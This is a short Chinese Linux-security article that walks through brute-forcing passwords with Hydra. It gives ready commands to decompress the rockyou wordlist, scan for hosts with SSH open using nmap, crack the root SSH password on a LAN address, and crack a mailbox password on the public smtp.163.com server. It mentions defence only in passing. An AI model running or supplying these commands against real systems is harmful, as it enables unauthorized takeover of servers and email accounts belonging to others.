云网牛站
所在位置:首页 > Linux安全 > 使用Hydra通过ssh破解密码

使用Hydra通过ssh破解密码

2017-10-19 21:27:44作者:Linux编辑稿源:topspeedsnail

Hydra是一款非常高效的网络登录破解工具,它可以对多种服务程序执行暴力破解(SSH、VNC等等)。防止这种攻击其实很容易,方法很多。

 

Kail Linux有一个的GUI版本:xhydra,也有一个命令行版本:hydra。

 

xhydra:

使用Hydra通过ssh破解密码

hydra:

使用Hydra通过ssh破解密码

我使用命令行版本:hydra。

 

字典

这种攻击需要字典文件,一个好的字典至关重要。我以Kali Linux自带的rockyou字典为例,位于/user/share/wordlists/rockyou.txt.gz。

使用前先解压:

# gzip -d /usr/share/wordlists/rockyou.txt.gz

 

使用nmap扫描开启SSH服务的主机

扫描SSH服务(22端口),确定可以施行破解的主机。

# nmap -p 22 -open -sV one_IP_or_range_or_subnet > MyTarget

 

使用hydra暴力破解

# hydra -s 22 -v -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.108 ssh

破解邮箱密码:

# hydra -S -l test@163.com -P /usr/share/wordlists/rockyou.txt -e ns -V -s 465 -t 1 smtp.163.com smtp

更多选项,查看man hydra。

精选文章
热门文章